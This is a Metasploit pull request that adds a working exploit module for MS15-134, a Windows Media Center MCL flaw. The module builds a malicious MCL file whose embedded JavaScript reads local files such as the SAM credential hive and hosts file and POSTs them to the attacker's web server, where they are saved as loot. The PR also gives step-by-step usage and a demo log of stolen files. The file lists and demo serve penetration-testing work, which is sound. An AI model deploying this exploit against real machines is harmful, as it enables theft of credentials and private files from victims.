### PR TITLE
Add MS15-134 Microsoft Windows Media Center MCL Information Disclosure

### DIFF
--- a/data/wordlists/sensitive_files_win.txt
+++ b/data/wordlists/sensitive_files_win.txt
@@ -1,7 +1,7 @@
-boot.ini
-config.sys
-autoexec.bat
-Windows\system32\drivers\etc\hosts
-winnt\system32\drivers\etc\hosts
-Windows\system32\config\SAM
-winnt\system32\config\SAM
+C:\boot.ini
+C:\config.sys
+C:\autoexec.bat
+C:\Windows\system32\drivers\etc\hosts
+C:\winnt\system32\drivers\etc\hosts
+C:\Windows\system32\config\SAM
+C:\winnt\system32\config\SAM

--- a/modules/auxiliary/server/ms15_134_mcl_leak.rb
+++ b/modules/auxiliary/server/ms15_134_mcl_leak.rb
@@ -1,0 +1,170 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'cgi'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'MS15-134 Microsoft Windows Media Center MCL Information Disclosure',
+      'Description'    => %q{
+        This module exploits a vulnerability found in Windows Media Center. It allows an MCL
+        file to render itself as a HTML document in the local machine zone by Internet Explorer,
+        which can be used to leak files on the target machine.
+      },
+      'Author'         =>
+        [
+          'Francisco Falcon', # Vuln discovery & PoCs & Detailed write-ups & awesomeness
+          'sinn3r'
+        ],
+      'References'     =>
+        [
+          ['CVE', '2015-6127'],
+          ['MSB', 'MS15-134'],
+          ['URL', 'https://blog.coresecurity.com/2015/12/09/exploiting-windows-media-center/'],
+          ['URL', 'http://www.coresecurity.com/advisories/microsoft-windows-media-center-link-file-incorrectly-resolved-reference']
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => "Dec 8 2015",
+    ))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']),
+        OptPath.new('FILES',      [true, 'Files you wish to download', ::File.join(Msf::Config.data_directory, 'wordlists', 'sensitive_files_win.txt')])
+      ], self.class)
+  end
+
+  def receiver_page
+    @receiver_page_name ||= Rex::Text.rand_text_alpha(5)
+  end
+
+  def js
+    %Q|
+function sendFile(fname, data) {
+  var xmlHttp = new XMLHttpRequest();
+  if (!xmlHttp) { return 0; }
+  xmlHttp.open('POST', '#{get_uri}/#{receiver_page}', true);
+  xmlHttp.setRequestHeader('Content-type', 'multipart/form-data');
+  xmlHttp.setRequestHeader('Connection', 'close');
+  var body = 'fname=' + encodeURIComponent(fname) + '&data=' + data.toString();
+  xmlHttp.send(body);
+}
+
+function getFile(fname) {
+  var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
+  xmlHttp.open('GET', fname, false);
+  xmlHttp.send();
+  return xmlHttp.responseBody.toArray();
+}
+
+var files = [#{load_file_paths * ","}];
+
+for (var i=0; i < files.length; i++) {
+  try {
+    var data = getFile('file:///' + files[i]);
+    sendFile(files[i], data);
+  } catch (e) {}
+}
+
+    |
+  end
+
+  def generate_mcl
+    %Q|<application url="msf.mcl">
+<html>
+<head>
+<meta http-equiv="x-ua-compatible" content="IE-edge">
+</head>
+<body>
+<script type="text/javascript">
+#{js}
+</script>
+</body>
+</html>
+</application>
+    |
+  end
+
+  def load_file_paths
+    @files ||= lambda {
+      buf = ''
+      ::File.open(datastore['FILES'], 'rb') do |f|
+        buf = f.read
+      end
+      buf.split.map { |n| "\"#{n.gsub!(/\\/, '/')}\"" }
+    }.call
+  end
+
+  def run
+    exploit
+  end
+
+  def start_service(opts = {})
+    super
+    print_status("Generating #{datastore['FILENAME']}...")
+    mcl = generate_mcl
+    file_create(mcl)
+    print_status("Pass #{datastore['FILENAME']} to the target you wish to exploit.")
+    print_status("When the MCL is executed, it should start sending data (files) back")
+    print_status("back to our web server.")
+  end
+
+  def is_ie?(request)
+    fp = fingerprint_user_agent(request.headers['User-Agent'])
+    fp[:ua_name] == HttpClients::IE
+  end
+
+  def parse_data(data)
+    buf = ''
+    data.scan(/\d+/).each do |n|
+      buf << n.to_i.chr
+    end
+    buf
+  end
+
+  def parse_body(body)
+    params = CGI::parse(body)
+
+    {
+      fname: ::File.basename(params['fname'].first),
+      data:  parse_data(params['data'].first)
+    }
+  end
+
+  def on_request_uri(cli, request)
+    unless is_ie?(request)
+      print_error('Client is not Internet Explorer.')
+      send_not_found(cli)
+      return
+    end
+
+    unless /#{receiver_page}/i === request.uri
+      print_error("Unknown request: #{request.uri}")
+      send_not_found(cli)
+      return
+    end
+
+    buff = ''
+
+    print_status("Receiving data...")
+    file = parse_body(request.body.to_s)
+    p = store_loot('mcl.file', 'application/octet-stream', cli.peerhost, file[:data], file[:fname])
+    print_good("#{file[:fname]} saved as: #{p}")
+
+    # If you are kind of lazy to open the saved files, and just sort of want to see the data,
+    # here you go (handy for debugging purposes, but against a larger network this is probably
+    # too much info)
+    vprint_status("File collected: #{file[:fname]}\n\n#{Rex::Text.to_hex_dump(file[:data])}")
+
+  end
+
+end

--- a/modules/auxiliary/server/ms15_134_mcl_leak.rb
+++ b/modules/auxiliary/server/ms15_134_mcl_leak.rb
@@ -17,8 +17,12 @@ class Metasploit3 < Msf::Auxiliary
       'Name'           => 'MS15-134 Microsoft Windows Media Center MCL Information Disclosure',
       'Description'    => %q{
         This module exploits a vulnerability found in Windows Media Center. It allows an MCL
-        file to render itself as a HTML document in the local machine zone by Internet Explorer,
+        file to render itself as an HTML document in the local machine zone by Internet Explorer,
         which can be used to leak files on the target machine.
+
+        Please be aware that if this exploit is used against a patched Windows, it can cause the
+        computer to be very slow or unresponsive (100% CPU). It seems to be related to how the
+        exploit uses the URL attribute in order to render itself as an HTML file.
       },
       'Author'         =>
         [
@@ -115,7 +119,7 @@ for (var i=0; i < files.length; i++) {
     file_create(mcl)
     print_status("Pass #{datastore['FILENAME']} to the target you wish to exploit.")
     print_status("When the MCL is executed, it should start sending data (files) back")
-    print_status("back to our web server.")
+    print_status("to our web server.")
   end
 
   def is_ie?(request)

--- a/modules/auxiliary/server/ms15_134_mcl_leak.rb
+++ b/modules/auxiliary/server/ms15_134_mcl_leak.rb
@@ -79,7 +79,7 @@ for (var i=0; i < files.length; i++) {
   end
 
   def generate_mcl
-    %Q|<application url="msf.mcl">
+    %Q|<application url="#{datastore['FILENAME']}">
 <html>
 <head>
 <meta http-equiv="x-ua-compatible" content="IE-edge">


### PR DESCRIPTION
This module exploits a vulnerability found in Windows Media Center. It allows an MCL file to render itself as a HTML document in the local machine zone by Internet Explorer, which can be used to leak files on the target machine.
## Verification
- [x] Start a Windows 7 SP1 box
- [x] If you have never ever started Windows Media Center on your box, you need to do that and set it up. This step is pretty simple, just follow the instructions from WMC.
- [x] Start msfconsole
- [x] Do: `use auxiliary/server/ms15_134_mcl_leak`
- [x] Do: `set verbose true``
- [x] Do: `run`
- [x] Place the malicious MCL file on your Windows box. Double click on it.
- [x] On your msfconsole, you should see some files being stolen (it might take a few seconds to start seeing files being stolen)
## Demo (verbose mode)

```
msf auxiliary(ms15_134_mcl_leak) > rerun
[*] Reloading module...

[*] Using URL: http://0.0.0.0:8080/TCgBRcaLJAr
[*] Local IP: http://192.168.1.199:8080/TCgBRcaLJAr
[*] Generating msf.mcl...
[+] msf.mcl stored at /Users/wchen/.msf4/local/msf.mcl
[*] Pass msf.mcl to the target you wish to exploit.
[*] When the MCL is executed, it should start sending data (files) back
[*] back to our web server.
[*] Server started.
[*] 192.168.1.188    ms15_134_mcl_leak - Receiving data...
[+] 192.168.1.188    ms15_134_mcl_leak - config.sys saved as: /Users/wchen/.msf4/loot/20151217224117_default_192.168.1.188_mcl.file_162390.sys
[*] 192.168.1.188    ms15_134_mcl_leak - 192.168.1.188    ms15_134_mcl_leak - File collected: config.sys

46 49 4c 45 53 3d 34 30 0d 0a    |FILES=40..|


[*] 192.168.1.188    ms15_134_mcl_leak - Receiving data...
[+] 192.168.1.188    ms15_134_mcl_leak - autoexec.bat saved as: /Users/wchen/.msf4/loot/20151217224117_default_192.168.1.188_mcl.file_967762.bat
[*] 192.168.1.188    ms15_134_mcl_leak - 192.168.1.188    ms15_134_mcl_leak - File collected: autoexec.bat

52 45 4d 20 44 75 6d 6d 79 20 66 69 6c 65 20 66    |REM Dummy file f|
6f 72 20 4e 54 56 44 4d                            |or NTVDM|


[*] 192.168.1.188    ms15_134_mcl_leak - Receiving data...
[+] 192.168.1.188    ms15_134_mcl_leak - hosts saved as: /Users/wchen/.msf4/loot/20151217224117_default_192.168.1.188_mcl.file_521164.bin
[*] 192.168.1.188    ms15_134_mcl_leak - 192.168.1.188    ms15_134_mcl_leak - File collected: hosts

23 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20    |# Copyright (c) |
31 39 39 33 2d 32 30 30 39 20 4d 69 63 72 6f 73    |1993-2009 Micros|
6f 66 74 20 43 6f 72 70 2e 0d 0a 23 0d 0a 23 20    |oft Corp...#..# |
54 68 69 73 20 69 73 20 61 20 73 61 6d 70 6c 65    |This is a sample|
20 48 4f 53 54 53 20 66 69 6c 65 20 75 73 65 64    | HOSTS file used|
20 62 79 20 4d 69 63 72 6f 73 6f 66 74 20 54 43    | by Microsoft TC|
50 2f 49 50 20 66 6f 72 20 57 69 6e 64 6f 77 73    |P/IP for Windows|
2e 0d 0a 23 0d 0a 23 20 54 68 69 73 20 66 69 6c    |...#..# This fil|
65 20 63 6f 6e 74 61 69 6e 73 20 74 68 65 20 6d    |e contains the m|
61 70 70 69 6e 67 73 20 6f 66 20 49 50 20 61 64    |appings of IP ad|
64 72 65 73 73 65 73 20 74 6f 20 68 6f 73 74 20    |dresses to host |
6e 61 6d 65 73 2e 20 45 61 63 68 0d 0a 23 20 65    |names. Each..# e|
6e 74 72 79 20 73 68 6f 75 6c 64 20 62 65 20 6b    |ntry should be k|
65 70 74 20 6f 6e 20 61 6e 20 69 6e 64 69 76 69    |ept on an indivi|
64 75 61 6c 20 6c 69 6e 65 2e 20 54 68 65 20 49    |dual line. The I|
50 20 61 64 64 72 65 73 73 20 73 68 6f 75 6c 64    |P address should|
0d 0a 23 20 62 65 20 70 6c 61 63 65 64 20 69 6e    |..# be placed in|
20 74 68 65 20 66 69 72 73 74 20 63 6f 6c 75 6d    | the first colum|
6e 20 66 6f 6c 6c 6f 77 65 64 20 62 79 20 74 68    |n followed by th|
65 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20    |e corresponding |
68 6f 73 74 20 6e 61 6d 65 2e 0d 0a 23 20 54 68    |host name...# Th|
65 20 49 50 20 61 64 64 72 65 73 73 20 61 6e 64    |e IP address and|
20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 73    | the host name s|
68 6f 75 6c 64 20 62 65 20 73 65 70 61 72 61 74    |hould be separat|
65 64 20 62 79 20 61 74 20 6c 65 61 73 74 20 6f    |ed by at least o|
6e 65 0d 0a 23 20 73 70 61 63 65 2e 0d 0a 23 0d    |ne..# space...#.|
0a 23 20 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c    |.# Additionally,|
20 63 6f 6d 6d 65 6e 74 73 20 28 73 75 63 68 20    | comments (such |
61 73 20 74 68 65 73 65 29 20 6d 61 79 20 62 65    |as these) may be|
20 69 6e 73 65 72 74 65 64 20 6f 6e 20 69 6e 64    | inserted on ind|
69 76 69 64 75 61 6c 0d 0a 23 20 6c 69 6e 65 73    |ividual..# lines|
20 6f 72 20 66 6f 6c 6c 6f 77 69 6e 67 20 74 68    | or following th|
65 20 6d 61 63 68 69 6e 65 20 6e 61 6d 65 20 64    |e machine name d|
65 6e 6f 74 65 64 20 62 79 20 61 20 27 23 27 20    |enoted by a '#' |
73 79 6d 62 6f 6c 2e 0d 0a 23 0d 0a 23 20 46 6f    |symbol...#..# Fo|
72 20 65 78 61 6d 70 6c 65 3a 0d 0a 23 0d 0a 23    |r example:..#..#|
20 20 20 20 20 20 31 30 32 2e 35 34 2e 39 34 2e    |      102.54.94.|
39 37 20 20 20 20 20 72 68 69 6e 6f 2e 61 63 6d    |97     rhino.acm|
65 2e 63 6f 6d 20 20 20 20 20 20 20 20 20 20 23    |e.com          #|
20 73 6f 75 72 63 65 20 73 65 72 76 65 72 0d 0a    | source server..|
23 20 20 20 20 20 20 20 33 38 2e 32 35 2e 36 33    |#       38.25.63|
2e 31 30 20 20 20 20 20 78 2e 61 63 6d 65 2e 63    |.10     x.acme.c|
6f 6d 20 20 20 20 20 20 20 20 20 20 20 20 20 20    |om              |
23 20 78 20 63 6c 69 65 6e 74 20 68 6f 73 74 0d    |# x client host.|
0a 0d 0a 23 20 6c 6f 63 61 6c 68 6f 73 74 20 6e    |...# localhost n|
61 6d 65 20 72 65 73 6f 6c 75 74 69 6f 6e 20 69    |ame resolution i|
73 20 68 61 6e 64 6c 65 64 20 77 69 74 68 69 6e    |s handled within|
20 44 4e 53 20 69 74 73 65 6c 66 2e 0d 0a 23 09    | DNS itself...#.|
31 32 37 2e 30 2e 30 2e 31 20 20 20 20 20 20 20    |127.0.0.1       |
6c 6f 63 61 6c 68 6f 73 74 0d 0a 23 09 3a 3a 31    |localhost..#.::1|
20 20 20 20 20 20 20 20 20 20 20 20 20 6c 6f 63    |             loc|
61 6c 68 6f 73 74 0d 0a                            |alhost..|

```
